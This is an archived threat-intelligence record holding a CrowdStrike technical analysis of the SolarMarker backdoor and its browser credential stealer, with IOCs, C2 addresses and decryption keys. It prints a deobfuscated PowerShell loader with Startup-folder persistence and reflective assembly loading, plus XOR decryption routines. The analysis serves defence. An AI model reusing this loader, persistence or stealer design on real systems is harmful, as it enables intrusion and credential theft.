{
	"id": "76ed4a9b-b3c5-4a70-bb0d-ecc1c1d747aa",
	"created_at": "2026-04-06T00:18:54.884906Z",
	"updated_at": "2026-04-10T13:11:37.810713Z",
	"deleted_at": null,
	"sha1_hash": "e4cdd942fe0de559e51d7b79a203592cf3e9f292",
	"title": "A Technical Analysis of SolarMarker Backdoor | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1041430,
	"plain_text": "A Technical Analysis of SolarMarker Backdoor | CrowdStrike\r\nBy Tom Simpson - Tom Henry - Seb Walla\r\nArchived: 2026-04-05 22:03:29 UTC\r\nIn this blog, we take a look at a recent detection that was blocked by the CrowdStrike Falcon®® platform’s next-generation\r\nantivirus (NGAV). SolarMarker* backdoor features a multistage, heavily obfuscated PowerShell loader, which leads to a\r\n.NET compiled backdoor being executed. This blog details how the CrowdStrike Falcon® Complete™ team detected the\r\nbinary using the Falcon UI, our deobfuscation of the initial stages, and how we collaborate with the CrowdStrike Intel team\r\nto conduct further analysis and protect our customers from emerging threats.\r\nFalcon Complete Triage\r\nOn Oct. 12, 2020, the Falcon Complete team began receiving detections for likely malicious PowerShell scripts affecting\r\nmultiple customer environments. Falcon Prevent™ NGAV prevented the processes from running because the script\r\ndisplayed characteristics common to other known malicious scripts.\r\nFigure 1. Falcon UI showing detection and prevention. (Click to enlarge)\r\nCommand lines associated with the detections were immediately flagged as suspicious because they were executing the\r\ncontents of a temporary file, then removing the file immediately after running.\r\nFigure 2. SolarMarker PowerShell command line\r\nExamination of this activity through Falcon’s Process Explorer tree raised additional red flags due source of the detection\r\nbeing files downloaded via web browsers that were executable but masquerading as document files.\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 1 of 9\n\nFigure 3. Process Explorer showing SolarMarker process execution chain and prevention. (Click to enlarge)\r\nWhen reviewing the installer executable details\r\n( SHA256:3e99b59df79d1ab9ff7386e209d9135192661042bcdf44dde85ff4687ff57d01 ), it was observed that the files were\r\nsigned by a seemingly unrelated certificate signer with a recent first-seen date.\r\nFigure 4. SolarMarker related certificate details\r\nResearching the installer executable in public malware repositories established that the file was first uploaded a few days\r\nbeforehand. Suspicions were further raised by the large file size (114MB) along with the executable masquerading as a\r\nMicrosoft Word document. These suggested possible attempts to evade antivirus detection.\r\n Figure 5. SolarMarker installer\r\nexecutable icon\r\nThe installer also dropped legitimate binaries such as an application called “Docx2Rtf” (a known document converter) and a\r\ndemo of “Expert PDF.” The Falcon Complete team concluded that the technique was used to convince victims that they had\r\ndownloaded a corrupt document or required additional software to view the document.\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 2 of 9\n\nFigure 6. Docx2rtf Application\r\nFurther triage was performed using Falcon’s Real Time Response (RTR) mechanism to connect to an affected system and\r\ndirectly examine the PowerShell file referenced in the detection command line. The script performed an XOR decryption of\r\ndata contained in a second similarly named text file that, when decoded, contained another obfuscated PowerShell script.\r\nFigure 7. SolarMarker PowerShell obfuscation. (Click to enlarge)\r\nAlthough these processes were being blocked by the Falcon sensor, the Falcon Complete team decoded multiple levels of\r\nobfuscation and encryption and confirmed that the PowerShell script was malicious. The analysis identified persistence\r\nmechanisms and a command and control (C2) IP address within the decrypted payload of the script. Using these indicators\r\nof compromise (IOCs), the Falcon Complete team was able to verify that the malware was successfully blocked in all\r\ncustomer environments.\r\n Figure 8. Strings from SolarMarker payload\r\nThe investigation did not establish any clear link between targeted customers: The malware appeared across multiple\r\ndifferent verticals, in different regions and countries, and affected customers of various sizes. Initially, the infection vector\r\nappeared to be from phishing, but no strong correlation with email client activity was observed, which usually occurs during\r\nphishing campaigns. In the initial analysis, the Falcon Complete team could not link the malicious files to any known\r\nmalware families or threat actor campaigns and engaged the CrowdStrike Intelligence team to investigate further. Based on\r\nobserved filenames in public malware repositories (e.g., Advanced-Mathematical-Concepts-Precalculus-With-Applications-Solutions.exe ) and Falcon telemetry, the hypothesis is that the malware is delivered as a fake document\r\ndownload targeting users performing web searches for document files. CrowdStrike has observed a number of Google Sites\r\nhosted pages as lure sites for the malicious downloads. These sites advertise document downloads and are often highly\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 3 of 9\n\nranked in search results. The use of Google Sites suggests attempts by the threat actors to increase search ranking. The\r\nmalware installer filenames and lure sites have only been observed in English so far, and based on Falcon telemetry, it is\r\nclear that SolarMarker is most prevalent in Western countries, especially in the U.S.\r\nFigure 9. SolarMarker Infection Distribution\r\nThe executable with SHA256 hash 3e99b59df79d1ab9ff7386e209d9135192661042bcdf44dde85ff4687ff57d01 is an Inno\r\nSetup Installer. This program is the first stage in a multi-stage dropper chain leading to the SolarMarker backdoor. Figure 10\r\ngives an overview of the malware’s dropper chain.\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 4 of 9\n\nFigure 10. Overview of the SolarMarker Dropper Chain\r\nThe installer uses Inno Setup’s Pascal Scripting feature to customize its actions. It will first extract two temporary files to\r\n%Tmp%\\\u003cunique\u003e.tmp\\\u003cfilename\u003e , where \u003cunique\u003e is a unique directory name. The two files are the following:\r\nFilename SHA256 hash\r\nDocx2Rtf.exe caf8e546f8c6ce56009d28b96c4c8229561d10a6dd89d12be30fa9021b1ce2f4\r\nwaste.dat d730b47b0e8ce6c093fb492d2483a45f8bc93cac234a592d34c09945653daf4d\r\nBoth files will be deleted once the installer completes. The file Docx2Rtf.exe is the document converter Docx2Rtf version\r\n4.4, a benign file. The file waste.dat is 112 MB in size, but contains only zero bytes, indicating that the file was only\r\nincluded in the installer to increase its size, which is known to prevent detection by some security products. Once these two\r\nfiles are extracted, Docx2Rtf.exe is executed and the installer sleeps for five seconds. Then the installer checks if it is\r\nexecuted on one of its targeted operating system (OS) versions and exits if not. The targeted versions are Windows 8.1,\r\nWindows Server 2012 R2, Windows 10 and Windows Server 2016. After being certain about the OS, the installer decrypts a\r\nthird stage and writes it to %Temp%\\\u003crandom\u003e.txt , where \u003crandom\u003e is a random 32-character hexadecimal string. The third\r\nstage is encrypted twice with different keys, and the installer will only decrypt it once. The decryption function named\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 5 of 9\n\nDECRYPTPS takes in a hex-encoded-encrypted blob and a string-based key and performs a simple XOR operation. The\r\nfunction can be replicated in Python as follows:\r\ndef decryptps(enc_payload,key):\r\n enc_payload = unhexlify(enc_payload)\r\n key = key.encode(\"utf-8\")\r\n res=\"\"\r\n for i in range(0,len(enc_payload)):\r\n cur_enc_byte=enc_payload\r\n key_byte = keylen(key)\u003e\r\n decrypted_byte = cur_enc_byte ^ key_byte\r\n res += chr(decrypted_byte)\r\n return res\r\nAfter saving the one-time-decrypted third stage, the installer writes a second-stage PowerShell script to %Temp%\\\r\n\u003crandom\u003e.txt and executes it. This second stage contains the path to the previously written third stage.\r\nSecond Stage\r\nThe second stage’s sole purpose is decrypting the one-time-decrypted third stage written by the installer. All PowerShell\r\nscripts observed throughout the dropper chain use the same decryption algorithm, which in Python looks as follows:\r\ndef powershell_xor_decrypt(base64_encoded_payload,key):\r\n encrypted_payload=base64.b64decode(base64_encoded_payload)\r\n key=key.encode(\"utf-8\")\r\n res=\"\"\r\n for i in range(0,len(encrypted_payload)):\r\n cur_enc_byte=encrypted_payload\r\n key_byte=keylen(key)\u003e\r\n decrypted_byte= cur_enc_byte ^ key_byte\r\n res += chr(decrypted_byte)\r\n return res\r\nThe second stage will use the above algorithm to Base64-decode the one-time-decrypted third stage and XOR it with the\r\nfollowing key: ZleyoPSJVRHxIWGgnjbYmKUOvfQTsqMXhCtpzkdirBELcaDNwuAF . The decrypted third stage is subsequently\r\nexecuted using Invoke-Expression .\r\nThird Stage\r\nThe third stage drops a fourth stage to %AppDaTa%\\Microsoft\\\u003cRND4\u003e\\\u003cRND8\u003e.cmd where \u003cRND4\u003e and \u003cRND8\u003e are four\r\nand eight random characters, respectively. Additionally, the third stage writes the Base64-decoded backdoor to\r\n%AppDaTa%\\microsoft\\\u003cRND4\u003e\\\u003cRND52\u003e where \u003cRND4\u003e and \u003cRND52\u003e are four and 52 random characters, respectively.\r\nThis Base64-decoded backdoor has the following SHA256 hash:\r\n45ea9b5697517f7bdc5af83c62bb8de7821baef9463c466cfc0e881f21c32011 Furthermore, the third stage modifies shortcuts\r\n(.LNK files) on the desktop of the current user and .LNK files that are shared by all users on their desktop. The third stage\r\nwill alter some, but not all shortcuts to also execute a third stage, which is discussed below. A shortcut is changed only if its\r\ntarget path points to an existing file that has a file extension. Additionally, the shortcut is only modified when this target path\r\ndoes not contain the substring cmd.exe . Also, shortcuts with arguments are not altered. All other shortcuts are modified to\r\nexecute their original target using cmd.exe but additionally run a fourth stage. Once the shortcuts have been modified, the\r\nthird stage executes the fourth stage directly.\r\nFourth Stage\r\nThe following is a deobfuscated version of the fourth stage:\r\n$path_to_persist=$env:appdata+'\\microsoft\\windows\\start menu\\programs\\startup\\a7f9214c3844f0a883268d3853ba7.lnk';\r\nIf(-not(test-path $path_to_persist)){\r\n $wscript_shell=new-object -comobject wscript.shell;\r\n $shortcut=$wscript_shell.createshortcut($path_to_persist);\r\n $shortcut.windowstyle=7;\r\n $shortcut.targetpath=\u003cpath to fourth stage\u003e;\r\n $shortcut.save();\r\n};\r\nIf((get-process -name '*powershell*').count -lt 15){\r\n$xor_key=\"XlA7P25AfkVNcUBzKnJgXk5FbXk+VmNsfHdXcVo0dlkpIX5vVXh3cHVlK2h+aGxSTkZ3MjdWYXB8NkFVdCtCNTFvVHNQb3pPU00ycUA5YGF1OX5\r\n$decrypted_backdoor\u003csystem.io.file\u003e::readallbytes(\u003csystem.text.encoding\u003e::utf8.getstring(\u003csystem.convert\u003e::frombase64stri\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 6 of 9\n\nFor($i=0;$i -lt $decrypted_backdoor.count;){\r\n For($j=0;$j -lt $xor_key.length;$j++){\r\n $decrypted_backdoor\u003c$i\u003e=$decrypted_backdoor\u003c$i\u003e -bxor $xor_key\u003c$j\u003e;\r\n $i++;\r\n If($i -ge $decrypted_backdoor.count){\r\n $j=$xor_key.length\r\n }\r\n }\r\n };\r\n \u003csystem.reflection.assembly\u003e::load($decrypted_backdoor);\r\n \u003cd.m\u003e::run()\r\n}\r\nThis script establishes persistence by creating a shortcut under the following path:\r\n%AppData%\\microsoft\\windows\\startmenu\\programs\\startup\\a7f9214c3844f0a883268d3853ba7.lnk\r\nThis shortcut then points to the fourth stage itself. Once persistence has been established, the fourth stage then Base64-\r\ndecodes a path to the Base64-decoded backdoor. Recall that the Base64-decoded backdoor had been written to\r\n%AppDaTa%\\microsoft\\\u003cRND4\u003e\\\u003cRND52\u003e by the third stage. In the presented fourth stage sample, this Base64-encoded path\r\nis:\r\nQzpcVXNlcnNcZXhhbXBsZV91c2VyXEFwcERhdGFcUm9hbWluZ1xNSUNyb1NPZlRcU1lIclxPRnJTR1ZkVFdheGttS0llQW5Vb1p3Y0N5dmlzYlFOcVJ6dXBKRWhQZ01qdFhmRExs\r\nwhich decodes to the following path:\r\nC:\\Users\\example_user\\AppData\\Roaming\\MICroSOfT\\SYHr\\OFrSGVdTWaxkmKIeAnUoZwcCyvisbQNqRzupJEhPgMjtXfDLlHYB\r\nThe file referenced by this path is read and then XORed with the following key:\r\nXlA7P25AfkVNcUBzKnJgXk5FbXk+VmNsfHdXcVo0dlkpIX5vVXh3cHVlK2h+aGxSTkZ3MjdWYXB8NkFVdCtCNTFvVHNQb3pPU00ycUA5YGF1OX5+XnBgZmVzcW87eEFzRVA4bXFO\r\nThe result of this decryption is a .NET executable with the following SHA256 hash:\r\nceb42fea3be898251028e2c5128a69451212bcb48a4871454c60dc2262426677 Finally, the fourth stage loads the executable as\r\n.NET assembly and calls the D::M.Run method.\r\nBackdoor\r\nThis Run function is the entry point of the SolarMarker backdoor (alias C2 Jupyter client). Initially, the backdoor generates\r\na 32-byte random string as a victim ID and saves it under %AppData%\\AppData\\Roaming\\solarmarker.dat . Additionally, the\r\nmalware collects information about the computer and sends an initial request to its C2 server at\r\nhttp\u003c:\u003e//45.135.232\u003c.\u003e131 . Communication between the backdoor and its C2 servers is facilitated via a JSON-like\r\nprotocol where each message is encrypted using the following hardcoded XOR key:\r\n4qMpLcYfVM4eimGl4Qz7cxPiafbL9edWpM1O Once encrypted, messages are Base64-encoded and sent via a POST request to\r\nthe C2 server. The initial message contains the following information:\r\nKey Description\r\naction\r\nRequest type for messages sent from backdoor to C2. In the initial message from the backdoor,\r\nthis has value ping .\r\nhwid Uniquely identifies victim PC using a randomly generated string of length 32.\r\npc_name Machine name of the PC\r\nos_name Operating system version including service pack\r\narch CPU architecture\r\nrights Rights of the executing user\r\nworkgroup Workgroup of the PC\r\nversion Version of the backdoor. In the analyzed sample, this has value DR/1.0 .\r\nprotocol_version Likely version of the C2 communication protocol. In the analyzed sample, this value is 1 .\r\nThe C2 server then responds to this message using a task that is either of type status=command , status=file , or\r\nstatus=idle . Tasks of type idle contain nothing else but the status field. Task for command type:\r\nKey Description\r\nstatus Type of command from C2\r\ncommand Commands to execute using PowerShell\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 7 of 9\n\nTask for file :\r\nKey Description\r\nstatus Type of command from C2\r\ntask_id Task ID likely used to reidentify a started task\r\ntype Type of file to be executed. This can either be the file extension exe or ps1 .\r\nTasks of command type are directly executed via PowerShell and the backdoor waits 30 seconds before sending another\r\ninitial message to request a new task. For file tasks, the client requests the file to execute using the following message:\r\nKey Description\r\naction The request type to retrieve a file is get_file .\r\nhwid Unique identifier for victim PC\r\ntask_id Task ID from the task which requested a file to be executed\r\nprotocol_version Version of the C2 communication protocol. In this sample, the version is 1 .\r\nThe C2 then answers with a payload that is saved under %Temp%\\\u003cRND24\u003e.\u003cexe/ps1\u003e with the respective extension, where\r\n\u003cRND24\u003e are 24 random characters. Next the payload is executed. After 30 seconds, the backdoor sends the following\r\nmessage to the C2:\r\nKey Description\r\naction The request type to report the execution of a file is change_status .\r\nhwid Unique identifier for victim PC\r\ntask_id Task ID from the task that requested a file to be executed\r\nis_success Always set to true . Independent of the exit code of the executed payload.\r\nprotocol_version Version of the C2 communication protocol. In the observed sample, the version is 1 .\r\nThe C2 is expected to respond with a new task to this message.\r\nCredential Harvester\r\nOn Oct. 15, 2020, CrowdStrike Intelligence observed the backdoor distributing a credential harvester. CrowdStrike\r\nIntelligence dubbed this malware SolarMarker Stealer (aka Jupyter Stealer). The stealer's first stage is a PowerShell script\r\nwith the following SHA256 hash: 2a8bc51367801c87ca2c64fdad1d0b06f91bbbc4f0f16ad18dbc122fda3d1a87 This\r\nPowerShell script contains a Base64-encoded payload with the following SHA256 hash:\r\n73dcbbf322b72e2cf675ca3356a7ece34e24108a82ad36eeb98596a35c8fdb16 This payload is Base64-decoded and then XORed\r\nusing the following key:\r\nQH5WcmheMHRucV5TSDZUQHYpKG1eb29WQl5TITtHQHF2d3peMEE0NEBScGFiXlNgYURAc3pac0B7Tj9lXjFoRkBeb293S0B1ckJIXjBKSjleTXxnYV4wYj96Xm47eldAcXZ3fUB8\r\nThe resulting payload with SHA256 hash ce486097ad2491aba8b1c120f6d0aa23eaf59cf698b57d2113faab696d03c601 is a\r\n.NET based credential harvester configured for the C2 server https\u003c:\u003e//vincentolife\u003c.\u003ecom/j . The malware is capable\r\nof stealing passwords, cookies and form auto-completion data from Google Chrome and Mozilla Firefox. Additionally, the\r\nstealer extracts the certificate and key databases from Firefox. The stolen data is sent to the C2 at\r\nhttps\u003c:\u003e//vincentolife\u003c.\u003ecom/j/post?q= using a POST request, where the GET parameter q is a JSON array containing\r\nthe following information about the victim PC:\r\nKey Description\r\nhwid\r\nUniquely identifies victim PC using a randomly generated string of length 32. Saved in\r\n%userprofile%\\AppData\\Roaming\\solarmarker.dat\r\npn Machine name of the PC\r\nos Operating system version including service pack\r\nx CPU architecture\r\nprm Rights of the executing user\r\nver Likely version of the stealer. In the analyzed sample, this has value CSDN/1.8\r\nFurther, SolarMarker Stealer is capable of decrypting data for the current user that has been encrypted using Microsoft's\r\nData Protection API.\r\nIndicators of Compromise\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 8 of 9\n\nFiles\r\nDescription Path if applicable SHA256 hash if applicable\r\nSecond\r\nstage\r\n%Temp%\\\u003crandom chars\u003e.txt Changes due to randomly generated path to third stage it contains\r\nEncrypted\r\nthird stage\r\n%Temp%\\\u003crandom chars\u003e.txt e82a58e59321852c6857aa511472cbb7327822461a03e3c189304b2c36f17273\r\nThird stage None 2860a7b98dbfc4c10347187e79d7528a875dd71a893ce025190b57bcb1bcc0f0\r\nFourth stage %AppData%\\microsoft\\\u003cRND4\u003e\\\u003cRND8\u003e.cmd Changes due to randomly generated paths it contains\r\nEncrypted\r\nbackdoor\r\nNone b3e6a879d4ac3fff34b520f39994639df26e846087632fb7505e89a4da220868\r\nBase64-\r\ndecoded\r\nbackdoor\r\n%AppData%\\microsoft\\\u003cRND4\u003e\\\u003cRND52\u003e 45ea9b5697517f7bdc5af83c62bb8de7821baef9463c466cfc0e881f21c32011\r\nBackdoor None ceb42fea3be898251028e2c5128a69451212bcb48a4871454c60dc2262426677\r\nSolarMarker\r\nStealer first\r\nstage\r\n%Temp%\\\u003cRND24\u003e.ps1 2a8bc51367801c87ca2c64fdad1d0b06f91bbbc4f0f16ad18dbc122fda3d1a87\r\nSolarMarker\r\nStealer\r\nNone ce486097ad2491aba8b1c120f6d0aa23eaf59cf698b57d2113faab696d03c601\r\nVictim ID %userprofile%\\AppData\\Roaming\\solarmarker.dat Changes due to randomly generated content\r\nNetwork\r\nDescription C2\r\nSolarMarker Backdoor C2 http\u003c:\u003e//45.135.232\u003c.\u003e131\r\nSolarMarker Stealer C2 https\u003c:\u003e//vincentolife\u003c.\u003ecom/j\r\n*The SolarMarker backdoor was originally named in public reporting in October 2020 and is not in any way related to\r\nthe recent high-profile SUNBURST/SUNSPOT intrusion activity.\r\nAdditional Resources\r\nLearn how any size organization can achieve optimal security with Falcon Complete by visiting the product\r\nwebpage.\r\nLearn about CrowdStrike’s comprehensive next-gen endpoint protection platform by visiting the Falcon products\r\nwebpage.\r\nTest CrowdStrike next-gen AV for yourself: Start your free trial of Falcon Prevent.\r\nSource: https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/"
	],
	"report_names": [
		"solarmarker-backdoor-technical-analysis"
	],
	"threat_actors": [
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434734,
	"ts_updated_at": 1775826697,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e4cdd942fe0de559e51d7b79a203592cf3e9f292.pdf",
		"text": "https://archive.orkl.eu/e4cdd942fe0de559e51d7b79a203592cf3e9f292.txt",
		"img": "https://archive.orkl.eu/e4cdd942fe0de559e51d7b79a203592cf3e9f292.jpg"
	}
}